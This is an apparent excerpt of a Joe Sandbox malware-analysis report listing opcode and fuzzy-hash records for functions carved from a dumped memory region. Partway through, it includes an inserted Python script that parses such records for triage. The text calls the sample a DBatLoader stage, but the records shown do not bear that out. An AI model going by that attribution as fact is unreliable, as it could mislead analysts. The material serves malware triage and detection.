                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 096be922d8c6d828ed3d2cb87544fad267984dae871d5da2b27aec67033bc488
                                                                                          • Instruction ID: 99bd98eef6e53d4867b771d62cf82fe45f58df7507e470e4a688a835990d146c
                                                                                          • Opcode Fuzzy Hash: 096be922d8c6d828ed3d2cb87544fad267984dae871d5da2b27aec67033bc488
                                                                                          • Instruction Fuzzy Hash: C431E431741681DBE3126B54EE54F26F7E8BF40780F1A08B0EB469B6D3DB28D841CA25
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aa3cc6c35de56356e0535c6db9b023820b0174efbf2d718eb57ed86f7cf12cac
                                                                                          • Instruction ID: 98f2966bce631d913c0954e32f4ca6a77bea071fe78ef8091329127425f49552
                                                                                          • Opcode Fuzzy Hash: aa3cc6c35de56356e0535c6db9b023820b0174efbf2d718eb57ed86f7cf12cac
                                                                                          • Instruction Fuzzy Hash: 57319A72E41218AFCB21EEA9C840A9FBBF9EF48B50F118476E915E7251D670DA009B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 16d7d7c9678e54b99261a8f6c1f48195408660becbff127f4a6a666636af5c44
                                                                                          • Instruction ID: d92af0c81511af285ae0bf07491621f08d45fbdca3853d0c7fdcdf915aa76a3b
                                                                                          • Opcode Fuzzy Hash: 16d7d7c9678e54b99261a8f6c1f48195408660becbff127f4a6a666636af5c44
                                                                                          • Instruction Fuzzy Hash: 4C317276A4012CAFCB21EF54DD88BCE77F9AB9C310F1140E5E508A7251DA31DE919F90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 241e733c94190b086d3ec7217858d9e926f6f40878c8937b41818ffddff93dce
                                                                                          • Instruction ID: 10a18567c8e0a1889bee3c6cf1e4a94fa9e4284d0021a3c7d66905a53a445304
                                                                                          • Opcode Fuzzy Hash: 241e733c94190b086d3ec7217858d9e926f6f40878c8937b41818ffddff93dce
                                                                                          • Instruction Fuzzy Hash: 5131E571A40625AFD712AF98CC50B9EBBB9AF98364F014069E915DB342DA70DE00CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7d4c642d4d91698d542e752b4a2e8ff0a0cec313c9dd3b101a8905cc6ae77490
                                                                                          • Instruction ID: 9a959266dbe96df9a881607416d3e20181635574fcc31456da20296370ff586a
                                                                                          • Opcode Fuzzy Hash: 7d4c642d4d91698d542e752b4a2e8ff0a0cec313c9dd3b101a8905cc6ae77490
                                                                                          • Instruction Fuzzy Hash: 2431B175A411299FE720AF69CC48F9FBBF8FF45644F0140AAEA08E3211D6349E80CF91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8985022293a8f5c01f45d305489a1e26a5aeecb5224077f371c727b3c4334e40
                                                                                          • Instruction ID: 7d71f4708dfd3a8eeeb3cc8696c10e235a31e73e072988cf3db442eb8efd9e26
                                                                                          • Opcode Fuzzy Hash: 8985022293a8f5c01f45d305489a1e26a5aeecb5224077f371c727b3c4334e40
                                                                                          • Instruction Fuzzy Hash: EF3196B1505345AFC700EF18D68091ABBF1FF8A224F4149AAE48C9B352D3309A06EF92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                          • Instruction ID: 58424fd333ff3c6a076ef7d8d750aa07a8722a47a6a36bcb723c562f54222f7d
                                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                          • Instruction Fuzzy Hash: E2212836E4125BAACB01EBB68810BAFBBB9EF15B50F068075ED54F7340E270C94187A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42e6bc637b6c70c6d43e09df6a581d2f8610f1d415c67b94b93a6a6da819e083
                                                                                          • Instruction ID: 0bdca99620f5b51adfe330bc19351acde7c70d9d41c41ebb23ac6c0a34d0e92b
                                                                                          • Opcode Fuzzy Hash: 42e6bc637b6c70c6d43e09df6a581d2f8610f1d415c67b94b93a6a6da819e083
                                                                                          • Instruction Fuzzy Hash: 75310032B003059FC720FFA8CA81A6EB7F9AB94B08F01853AD216D3259D776DD41CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9d2d3b920ea27fe723c9a681fbf2b1ceac9f405fecaf3885eb8f7d3b69b76add
                                                                                          • Instruction ID: cae11d2a781858a48ea548ad5b49f38aa118d21930a3c5bbc0c8d1beb393da45
                                                                                          • Opcode Fuzzy Hash: 9d2d3b920ea27fe723c9a681fbf2b1ceac9f405fecaf3885eb8f7d3b69b76add
                                                                                          • Instruction Fuzzy Hash: CE31CB71900205AFDB20EFA9D840FAEF7F4BB44314F14026AE6199B1D2DB70A985C791
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1fa4b9e756f08092f2d5b98610af358ea07cb18c176c79f5f14902d1b1b9a613
                                                                                          • Instruction ID: 3d1b4200157230e7e343f858198e291a4aee9c9a80a192b8f9bef2a0c4c2bcb7
                                                                                          • Opcode Fuzzy Hash: 1fa4b9e756f08092f2d5b98610af358ea07cb18c176c79f5f14902d1b1b9a613
                                                                                          • Instruction Fuzzy Hash: 7801D6B25415049FC321EF18D881F42B7AAEB99B70B228275E9689B192E730DE01CBD0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                          • Instruction ID: 551766d05a72b717c0ae837cff370a557ecc9689086828d838380deefa7e042d
                                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                          • Instruction Fuzzy Hash: F8012272405B11AFC7209F1AE840A2A7BE4FF55B70B01CA3DFC958B281C332E900DBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                          • Instruction ID: b2aa3ccce0735539bddea6e44efd82c2d3de5119fa03bacc08f825124253bd57
                                                                                          • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                          • Instruction Fuzzy Hash: A301B1726042557BDB29ABA1DC60B9F7BB8EB81B50F528079F9075B280D6B4DC80C3F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32d33efaf10bdac0e9e453031762e3298067c6972d572d11fdf7aaf8684df8a3
                                                                                          • Instruction ID: a8e5c3adf9bf31c573f3d0b9621f5c020aa0724234a2e01d056527b6fb3239a5
                                                                                          • Opcode Fuzzy Hash: 32d33efaf10bdac0e9e453031762e3298067c6972d572d11fdf7aaf8684df8a3
                                                                                          • Instruction Fuzzy Hash: 7501D832B00602AFCB20BE65D89495B7BA9FF94BB0B000138FA5493662DF21EC10E7D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 754779dd4b05571f629046fc7807ac0b23bd4809b916e8b6f813b1de9db5b070
                                                                                          • Instruction ID: 7f20b800400d325399292096b47ce401513acd2c44ac75641b3e38e1619dee76
                                                                                          • Opcode Fuzzy Hash: 754779dd4b05571f629046fc7807ac0b23bd4809b916e8b6f813b1de9db5b070
                                                                                          • Instruction Fuzzy Hash: 90115EB1A82218AFDB65AF64CD51FD9B3B4BB08710F5041E4E324A60E2D7709E81CF89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c54e8d6f546de5dc61ddcc2511a26a945381c9d214c33a05b4b2d2264eb67f3f
                                                                                          • Instruction ID: c817494b64d822ca16cd871b4a2f7b5fffdd14306b5ffa35e23b4b78bec60d71
                                                                                          • Opcode Fuzzy Hash: c54e8d6f546de5dc61ddcc2511a26a945381c9d214c33a05b4b2d2264eb67f3f
                                                                                          • Instruction Fuzzy Hash: 4C012431480214BFC321BF10D640D2AFBE9FF96660B09447EE1485B602CB34EC51EF91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4de993d4b6e37f2facd91c63bab0d6e4094288f93deaf822fb28a7226a216d7b
                                                                                          • Instruction ID: 18de4cc8689a1393ff28d3507ced853179c10bed35cbd7c4b411da5cf728ee03
                                                                                          • Opcode Fuzzy Hash: 4de993d4b6e37f2facd91c63bab0d6e4094288f93deaf822fb28a7226a216d7b
                                                                                          • Instruction Fuzzy Hash: 4911E8B1A00219AFCB04DFA9D541A9EB7F8FF58250F10806AF905E7351E674EE018BA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3c64c9fb32f72a4eb55438ca6c4ee2894b50de240e75f62643c91fd870906893
                                                                                          • Instruction ID: 1ea8d5828f1490c5978ecf5ba86f782924c7bad42bea5c8c1039a89f03ad61ab
                                                                                          • Opcode Fuzzy Hash: 3c64c9fb32f72a4eb55438ca6c4ee2894b50de240e75f62643c91fd870906893
                                                                                          • Instruction Fuzzy Hash: 6A019EB3A00158AFCF11EFA9CD45EAFBBB9EB58660F050064E619E7211C634DE10CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03f484eb0a748fb119ae4dfbf8df3e2a6ac414626b585f5f421ba18e7237e8c9
                                                                                          • Instruction ID: 8492b1070f9088647cb9559bfd71733e9dfffffbed5b2a8c822360420ebb667a
                                                                                          • Opcode Fuzzy Hash: 03f484eb0a748fb119ae4dfbf8df3e2a6ac414626b585f5f421ba18e7237e8c9
                                                                                          • Instruction Fuzzy Hash: 5A111773900019BBCB15DBD4CC80DDFBBBDEF48254F044166E906E7211EA34AA14CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                          • Instruction ID: f0d070137fdc9b75a45dfab7aecfe460e14b1308b0f8a56567b5083c1b5d5693
                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                          • Instruction Fuzzy Hash: 5D012D327002019BDB44AE59E880F46BBE5BFDC710F1541B5ED00CF247EAB1C841D790
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f73bc5c82b952e4cd271fad8db761aa5a5813542c5d2defd4c1f2efeb1a4866a
                                                                                          • Instruction ID: e3ba727bede0cbe000fbfb4062d692d686ccfbfee299923538b634d7c79bcb2b
                                                                                          • Opcode Fuzzy Hash: f73bc5c82b952e4cd271fad8db761aa5a5813542c5d2defd4c1f2efeb1a4866a
                                                                                          • Instruction Fuzzy Hash: 90014C332247019FC320EFACD84499BB7E8EF98660F114139F9588B290E730D901CBD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                          • Instruction ID: 65d6cc69b650cc50a00db25f55d7919e0dd8652559f2bf01f7fb0318d6eb0825
                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                          • Instruction Fuzzy Hash: 2A01F532140745AFEB22AA66D800F9777E9FFC5750F014439E685CB540DA70F546DB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae3476dd6baf5b74ffc1d3fe050f436af5b8382b9110c0f5636f21bad7264fbf
                                                                                          • Instruction ID: 5b1bf7587bfc043ce505045bb557f769edfa803dc5ffb8dc4c9760680921042f
                                                                                          • Opcode Fuzzy Hash: ae3476dd6baf5b74ffc1d3fe050f436af5b8382b9110c0f5636f21bad7264fbf
                                                                                          • Instruction Fuzzy Hash: 80118071A0120CAFCF04EFA4C851F9E7BB6EB58340F1040A9F91197391E635DE11CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0795770ac9b53880bc79b5c4fbd1b6187fc9ae65bc78d9fa1132db59f49b4010
                                                                                          • Instruction ID: ca85c7ed5d8f7f906466302610d7dd55eb6d71265034c983796e313edea15d22
                                                                                          • Opcode Fuzzy Hash: 0795770ac9b53880bc79b5c4fbd1b6187fc9ae65bc78d9fa1132db59f49b4010
                                                                                          • Instruction Fuzzy Hash: 3E1139B16183089FC700EF69D44594BBBE8EF99750F00856AF958D73A1E670E900CBA6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                          • Instruction ID: 90d9bcc0ab3c09d05439a47077de8e523fe467ec3ed55519d2e94a7b419c9dba
                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                          • Instruction Fuzzy Hash: 3801D8762006059FD711AA69E881F97B7E6FBC5A20F0A4479E6438B690DA70F981C790
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 907ce4ff74f1adcd99fa0cf0cce46c336bc6be141f71bc09b41858aecb933a5a
                                                                                          • Instruction ID: 11bd78f521cd0f45014cd6576385434bb872f8fe1e1f46847cab42944a546208
                                                                                          • Opcode Fuzzy Hash: 907ce4ff74f1adcd99fa0cf0cce46c336bc6be141f71bc09b41858aecb933a5a
                                                                                          • Instruction Fuzzy Hash: 52113CB16183049FC700DF69D44595BBBE4EF98710F00455EF998D7351E634E900CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c5d9b0c752c9d4a7f0426f148dd33e45b15f2274294c334cb586f56271966634
                                                                                          • Instruction ID: 76d31778b6c4ffaac25060ef9fa4fe968cc211b5469390f22254a304e762531d
                                                                                          • Opcode Fuzzy Hash: c5d9b0c752c9d4a7f0426f148dd33e45b15f2274294c334cb586f56271966634
                                                                                          • Instruction Fuzzy Hash: AB01A271280704AFD3216F55D940F17FBA8EF59B60F11043AF24A9F391D6B59841CB58
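The records above are the per-function metadata Joe Sandbox attaches to code carved from the dumped region at 2A010000 in process 3; only one of them (the record tagged InitializeThunk) resolved to an API name, and every record carries an Opcode ID and an Instruction Fuzzy Hash that can be used to pivot to other samples. The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses records in this layout out of a text export, flags the functions that resolved to an API, checks that the two opcode hashes in each record agree, and decodes the memory-region attributes from the dump file name. The sample input is constructed from two of the records on this page. The field layout assumed for the .sdmp name (process, stage, counter, base address, protection, state, type) is an assumption about Joe Sandbox's naming, not something the report documents; the protection decoding uses the standard winnt.h PAGE_* constants.

```python
import re

# Constructed sample input: two per-function records copied in the layout the
# extracted Joe Sandbox report uses (leading indentation kept on purpose).
SAMPLE = """\
            Memory Dump Source
            • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: c5d9b0c752c9d4a7f0426f148dd33e45b15f2274294c334cb586f56271966634
            • Instruction ID: 76d31778b6c4ffaac25060ef9fa4fe968cc211b5469390f22254a304e762531d
            • Opcode Fuzzy Hash: c5d9b0c752c9d4a7f0426f148dd33e45b15f2274294c334cb586f56271966634
            • Instruction Fuzzy Hash: AB01A271280704AFD3216F55D940F17FBA8EF59B60F11043AF24A9F391D6B59841CB58
            Memory Dump Source
            • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d61e89b23aa3d5273e4d8174757bdec314a7e037c38b7d05d72ed2930c2435a7
            • Instruction ID: 3ba6d51808aeb7f4e0bda1202539a16b23bd91e9b74aed834af92df3d4ef32c1
            • Opcode Fuzzy Hash: d61e89b23aa3d5273e4d8174757bdec314a7e037c38b7d05d72ed2930c2435a7
            • Instruction Fuzzy Hash: 2A01DB73B003059BD710AF98D9C4B5EBBFDBB88760F510035E60097251D7B5DD049754
"""

# "• Field Name: value" (value may be empty); headings without a bullet are skipped.
FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*?)\s*$")
DUMP_RE = re.compile(
    r"^(?P<dump>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)

# Windows memory-protection constants from winnt.h, used to decode the
# protection field carried in the dump file name.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}


def parse_records(text):
    """Split report text into one dict per 'Memory Dump Source' record."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = FIELD_RE.match(line)
        if m and cur is not None:
            cur[m.group(1).strip()] = m.group(2)
    return records


def describe_region(record):
    """Decode the 'Source File' field into process, base address, protection and PE flag.

    Assumption (not documented by the report): the dot-separated dump name is
    <process>.<stage>.<counter>.<base>.<protect>.<state>.<type>.<reserved>.sdmp.
    Only the process, base and protect fields are decoded here.
    """
    m = DUMP_RE.match(record.get("Source File", ""))
    if not m:
        return None
    parts = m.group("dump").split(".")
    base = int(parts[3], 16)
    protect = int(parts[4], 16)
    return {
        "process": int(parts[0], 16),
        "base": base,
        "offset_matches_base": base == int(m.group("offset"), 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "based_on_pe": m.group("pe") == "true",
    }


def summarize(records):
    """Triage summary: resolved API names, opcode-hash consistency, distinct instruction hashes."""
    api_ids = {r["API ID"] for r in records if r.get("API ID")}
    hashes_agree = all(r.get("Opcode ID") == r.get("Opcode Fuzzy Hash") for r in records)
    distinct = len({r.get("Instruction Fuzzy Hash") for r in records})
    return {
        "count": len(records),
        "api_ids": sorted(api_ids),
        "opcode_hashes_agree": hashes_agree,
        "distinct_instruction_hashes": distinct,
    }


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(summarize(recs))
    print(describe_region(recs[0]))
```

Run against a full text export, the summary tells you at a glance how many carved functions resolved to a known API (a low ratio is typical of packed or hollowed code such as this DBatLoader stage) and whether the region was dumped from executable, writable memory, which is the combination you expect for an unpacked payload.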
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d61e89b23aa3d5273e4d8174757bdec314a7e037c38b7d05d72ed2930c2435a7
• Instruction ID: 3ba6d51808aeb7f4e0bda1202539a16b23bd91e9b74aed834af92df3d4ef32c1
• Opcode Fuzzy Hash: d61e89b23aa3d5273e4d8174757bdec314a7e037c38b7d05d72ed2930c2435a7
• Instruction Fuzzy Hash: 2A01DB73B003059BD710AF98D9C4B5EBBFDBB88760F510035E60097251D7B5DD049754
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1e27cae01bff40a5e7a93c0b3fac8e62db951b2d32fdf2d9f156b0cb820dd6dc
• Instruction ID: 42e57d36af45cd105b4beeb24f7b581f0ee7d5fe8d1dd2b248260ea6476f5c2f
• Opcode Fuzzy Hash: 1e27cae01bff40a5e7a93c0b3fac8e62db951b2d32fdf2d9f156b0cb820dd6dc
• Instruction Fuzzy Hash: 2B01A731B10604DFD704FF66D8509AE77F9EFA0620F1580B9D901E7241EE64DD09C698
Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                          • Instruction ID: eb7beee564dd6eefbb1070325a402a60c1148557b313934664e1bc9278a2b1b7
